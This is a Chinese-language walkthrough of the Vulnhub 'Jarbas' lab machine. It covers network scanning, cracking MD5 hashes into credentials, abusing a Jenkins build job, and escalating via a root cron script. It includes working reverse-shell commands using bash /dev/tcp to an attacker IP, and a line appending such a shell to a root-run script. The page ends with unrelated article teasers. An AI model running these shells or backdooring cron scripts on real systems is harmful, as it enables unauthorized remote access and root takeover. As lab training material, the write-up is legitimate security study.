【Vulnhub靶机】Jarbas--Jenkins

文章目录

    • 信息收集
      • 主机发现
      • 端口扫描
      • 目录爆破
    • 漏洞探测
      • whatweb
      • hash-identifier
      • whatweb

文档说明:https://www.vulnhub.com/entry/jarbas-1,232/

靶机下载:Download (Mirror):

信息收集

主机发现

扫描C段

sudo nmap -sn 10.9.75.0/24

image-20231125131716854

端口扫描

sudo nmap --min-rate 10000 10.9.75.10

image-20231125131847664

详细扫描服务版本,系统

sudo nmap -sT -sV -O -p 22,80,3306,8080 10.9.75.10 

image-20231125132007149

目录爆破

dirsearch -u http://10.9.75.10 -i 200  

image-20231125132323184

漏洞探测

whatweb

访问80端口

image-20231125132425330

whatweb http://10.9.75.10

image-20231125133245051

并没有识别到类似的CMS内容管理系统,

继续访问access.html发现了类似用户名:加密后的密码的东西

image-20231125132945210

hash-identifier

可以使用工具来验证加密类型

hash-identifier "5978a63b4654c73c60fa24f836386d87"  

image-20231125133052923

拿去在线网站进行md5解密

image-20231125133516690

image-20231125133605822

image-20231125133636880

tiago:italia99

trindade:marianna

eder:vipsu

访问8080端口

image-20231125134737788

whatweb

whatweb http://10.9.75.10:8080

image-20231125134830353

指纹识别出一个Jenkins的CMS管理系统

尝试使用上面解密出来的密码进行登陆

使用eder:vipsu登陆成功!

image-20231125135041152

image-20231125135104467

新建一个任务

image-20231125135842524

选择第一个自由风格软件项目就可以,然后往下翻,点击确定

点击Build构建

image-20231125135948173

由于目标系统是linux系统,所以选择第二个execute shell

/bin/bash >& /dev/tcp/10.9.75.3/6868 0>&1#反弹到kali上

点击应用,然后点击保存

image-20231125140121483

这个时候kali先监听6868端口

nc  -lvvp 6868  

回到页面上点击立即构建

image-20231125140412821

就反弹到kali机器上了

image-20231125140529852

页面上会显示有一个任务正在运行

image-20231125140547563

我们拿到shell是没有回显的,可以通过python获取显示shell

python -c "import pty;pty.spawn('/bin/bash')"

image-20231125140911530

最后再计划任务里找到了以root运行 的程序

image-20231125141047389

查看文件内容

cat /etc/script/CleaningScript.sh

image-20231125141328159

可以在里面添加反弹shell,

echo "/bin/bash >& /dev/tcp/10.9.75.3/6869 0>&1" >> /etc/script/CleaningScript.sh

image-20231125141432284

kali监听6869端口,等待反弹

image-20231125141555084

Jenkins 的漏洞利用方式有很多,可以自行去网上查阅相关资料

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/217637.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

印刷基板开孔机上的直线导轨怎么安装?

直线导轨是属于高精度的传动元件,作为印刷基板开孔机重要的传动元件,倘若安装不当,严重则无法正常作业,轻则影响直线导轨的精度和寿命。那么,印刷基板开孔机的直线导轨是如何安装的呢? 在安装前&#xff0c…

(11_23)构建高效数据流转的 ETL 系统:数据库 + Serverless 函数计算的最佳实践

作者|柳下 概述 随着企业规模和数据量的增长,数据的价值越来越受到重视。数据的变化和更新变得更加频繁和复杂,因此及时捕获和处理这些变化变得至关重要。为了满足这一需求,数据库 CDC(Change Data Capture&#xff…

完蛋!我被ConcurrentHashMap源码包围了!(一)

文章目录 1. 引言2. 使用3. 初始化4. 存储流程5. 取值流程6. 扩容流程 1. 引言 ConcurrentHashMap是一个线程安全的HashMap,在JDK1.7与JDK1.8,无论是实现还是数据结构都会有所不一样。这促使了ConcurrentHashMap有着HashMap一样的面试高频考点。 接下来…

POE交换机——电源解决方案-升压控制器\降压控制器\中高压降压转换器

PoE是一种有线以太网供电技术,使用于数据传输的网线同时具备直流供电的能力,PoE供电具有可靠、连接简捷、标准统一的优势。越来越多的工业物联网设备开始采用PoE供电, 如IP电话、网络视频监控以及无线以太网设备等。 PoE交换机是一种用于提供…

华为ensp:trunk链路

当我们使用trunk链路后,还要选择要放行的vlan那就是全部vlan(all),但是all并不包括vlan1,所以我们的trunk链路中的all不对all进行放行 实现相同vlan之间的通信 先将他们加入对应的vlan lsw1 进入e0/0/3接口 interfa…

laravel实现发送邮件功能

Laravel提供了简单易用的邮件发送功能,使用SMTP、Mailgun、Sendmail等多种驱动程序,以及模板引擎将邮件内容进行渲染。 1.在项目目录.env配置email信息 MAIL_MAILERsmtp MAIL_HOSTsmtp.qq.com MAIL_PORT465 MAIL_FROM_ADDRESSuserqq.com MAIL_USERNAME…

青云科技容器平台与星辰天合存储产品完成兼容性互认证

近日, 北京青云科技股份有限公司(以下简称:青云科技)的 KubeSphere 企业版容器平台成功完成了与 XSKY星辰天合的企业级分布式统一数据平台 V6(简称:XEDP)以及天合翔宇分布式存储系统 V6&#xf…

Java实现-数据结构 2.时间和空间复杂度

.如何衡量一个算法的好坏:时间复杂度和空间复杂度 算法效率分为时间效率和空间效率,时间效率称为时间复杂度,空间效率称为空间复杂度 时间复杂度 算法的时间复杂度是一个数学函数,它描述了算法的运行时间,一个算法执…

debian 12设置静态ip、dns

debian 12设置静态ip、dns 1、设置静态ip2、设置dns 1、设置静态ip 查看网卡名称是ens33 ip address编辑网卡配置文件 vi /etc/network/interfaces默认情况是这样的 在最后面添加下面内容 其中ens33是上步中查询到的网卡名称 auto ens33 iface ens33 inet static address…

计算机视觉面试题-01

计算机视觉面试通常涉及广泛的主题,包括图像处理、深度学习、目标检测、特征提取、图像分类等。以下是一些可能在计算机视觉面试中遇到的常见问题: 图像处理和计算机视觉基础 图像是如何表示的? 图像在计算机中可以通过不同的表示方法&…

45岁后,3部位“越干净”,往往身体越健康,占一个也要恭喜!

众所周知,人的生命有长有短,而我们的身体健康状态,也同样会受到年龄的影响,就身体的年龄层次而言,往往需要我们用身体内部的干净程度来维持,换句话说就是:若是你的身体内部越干净,那…

全面(16万字)深入探索深度学习:基础原理到经典模型网络的全面解析

前言 Stacking(堆叠) 网页调试 学习率:它决定了模型在每一次迭代中更新参数的幅度激活函数-更加详细 激活函数的意义: 激活函数主要是让模型具有非线性数据拟合的能力,也就是能够对非线性数据进行分割/建模 如果没有激活函数: 第一个隐层: l…